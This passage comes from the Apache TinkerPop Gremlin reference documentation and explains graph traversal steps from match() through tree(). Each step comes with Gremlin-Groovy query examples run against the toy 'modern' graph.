capabilities (i.e. largest set reduction patterns execute first). For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n \"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).\n select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that standard inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).\n select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\n`MatchStep` brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory):\n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match(\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).\n select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Before and after a `match()`, it is possible to leverage classic Gremlin traversals.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match(\n __.as('x').in('created').as('y'),\n __.as('y').out('knows').as('z')).\n select('z').values('name')\n----\n\nIMPORTANT: The `match()`-step is stateless. The variable bindings of the traversal patterns are stored in the path history of the traverser. As such, the variables used over all `match()`-steps within a traversal are globally unique. A benefit of this is that subsequent `where()`, `select()`, `match()`, etc. steps can leverage the same variables in their analysis.\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match(\n __.as('b').out('created').as('c'),\n __.as('c').has('name','ripple')).\n select('c').as('c')).\n select('a','c').by('name')\n----\n\nIf a step-labeled traversal proceeds the `match()`-step and the traverser entering the `match()` is destined to bind to a particular variable, then the previous step should be labeled accordingly.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('knows').as('b').\n match(\n __.as('b').out('created').as('c'),\n __.not(__.as('c').in('created').as('a'))).\n select('a','b','c').by('name')\n----\n\nThere are three types of `match()` traversal patterns.\n\n . `as('a')...as('b')`: both the start and end of the traversal have a declared variable.\n . `as('a')...`: only the start of the traversal has a declared variable.\n . `...`: there are no declared variables.\n\nIf a variable is at the start of a traversal pattern it *must* exist as a label in the path history of the traverser else the traverser can not go down that path. If a variable is at the end of a traversal pattern then if the variable exists in the path history of the traverser, the traverser's current location *must* match (i.e. equal) its historic location at that same label. However, if the variable does not exist in the path history of the traverser, then the current location is labeled as the variable and thus, becomes a bound variable for subsequent traversal patterns. If a traversal pattern does not have an end label, then the traverser must simply \"survive\" the pattern (i.e. not be filtered) to continue to the next pattern. If a traversal pattern does not have a start label, then the traverser can go down that path at any point, but will only go down that pattern once as a traversal pattern is executed once and only once for the history of the traverser. Typically, traversal patterns that do not have a start and end label are used in conjunction with `and()`, `or()`, and `where()`. Once the traverser has \"survived\" all the patterns (or at least one for `or()`), `match()`-step analyzes the traverser's path history and emits a `Map<String,Object>` of the variable bindings to the next step in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b'). <1>\n match( <2>\n __.as('a').out().count().as('c'), <3>\n __.not(__.as('a').in().as('b')), <4>\n or( <5>\n __.as('a').out('knows').as('b'),\n __.as('b').in().count().as('c').and().as('c').is(gt(2)))). <6>\n dedup('a','c'). <7>\n select('a','b','c').by('name').by('name').by() <8>\n----\n\n<1> A standard, step-labeled traversal can come prior to `match()`.\n<2> If the traverser's path prior to entering `match()` has requisite label values, then those historic values are bound.\n<3> It is possible to use <<a-note-on-barrier-steps,barrier steps>> though they are computed locally to the pattern (as one would expect).\n<4> It is possible to `not()` a pattern.\n<5> It is possible to nest `and()`- and `or()`-steps for conjunction matching.\n<6> Both infix and prefix conjunction notation is supported.\n<7> It is possible to \"distinct\" the specified label combination.\n<8> The bound values are of different types -- vertex (\"a\"), vertex (\"b\"), long (\"c\").\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()`-step allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).\n select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `P`-predicate (example above) or a `Traversal` (example below). Using `MatchPredicateStrategy`, `where()`-clauses are automatically folded into `match()` and thus, subject to the query optimizer within `match()`-step.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match(\n __.as('a').has(label,'person'), <1>\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). <2>\n select('a','c').by('name'); null <3>\ntraversal.toString() <4>\ntraversal <5> <6>\ntraversal.toString() <7>\n----\n\n<1> Any `has()`-step traversal patterns that start with the match-key are pulled out of `match()` to enable the vendor to leverage the filter for index lookups.\n<2> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<3> A useful trick to ensure that the traversal is not iterated by Gremlin Console.\n<4> The string representation of the traversal prior to its strategies being applied.\n<5> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<6> Both marko and josh are co-developers and marko knows josh.\n<7> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\nIMPORTANT: A `where()`-step is a filter and thus, variables within a `where()` clause are not globally bound to the path of the traverser in `match()`. As such, `where()`-steps in `match()` are used for filtering, not binding.\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverser those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if its a person (as determined by having an `age`-property), then get all of their creations, else if its a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects are continued to be iterated. When within the low and high range (both inclusive), traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\nThe `range()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. For example, it is possible to produce a `Map<String, String>` for each traversed path, but containing only the second property value (the \"b\" step).\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').in().as('c').select('a','b','c').by('name').range(local,1,2)\n----\n\nThe next example uses the <<the-crew-toy-graph,The Crew>> toy data set. It produces a `List<String>` containing the second and third location for each vertex.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').range(local, 1, 3)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such, situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverser the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversal of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult).by('weight')`). Note that the <<by-step,`by()`>>-modulator can be any arbitrary traversal.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). The second example, demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as a primitives are encoded in the memory address of the sack, not as a reference to an object.\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previous in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts are vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select('a','b','c')\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select('a','b').by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b').by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b'). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select('a','b').by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are three results in the `store()` side-effect even though the interval selection is for 2 objects. Realize that when the third object is on its way to the `range()` filter (i.e. `[0..1]`), it passes through `store()` and thus, stored before filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store('x').by('weight').cap('x')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal. Each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[tail-step]]\nTail Step\n~~~~~~~~~\n\nimage::tail-step.png[width=530]\n\nThe `tail()`-step is analogous to <<limit-step,`limit()`>>-step, except that it emits the last `n`-objects instead of the first `n`-objects.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().tail() <1>\ng.V().values('name').order().tail(1) <2>\ng.V().values('name').order().tail(3) <3>\n----\n\n<1> Last name (alphabetically).\n<2> Same as statement 1.\n<3> Last three names.\n\nThe `tail()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('a').out().as('a').select('a').by(tail(local)).values('name') <1>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local) <2>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local, 2) <3>\ng.V().valueMap().tail(local) <4>\n----\n\n<1> Only the most recent name from the \"a\" step (`List<Vertex>` becomes `Vertex`).\n<2> Same result as statement 1 (`List<String>` becomes `String`).\n<3> `List<String>` for each path containing the last two names from the 'a' step.\n<4> `Map<String, Object>` for each vertex, but containing only the last property value.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not about getting an exact answer as its about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even through the number of traversers at each vertex is not. The primary benefit being that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such this situation.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see `Tree` JavaDoc).\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching 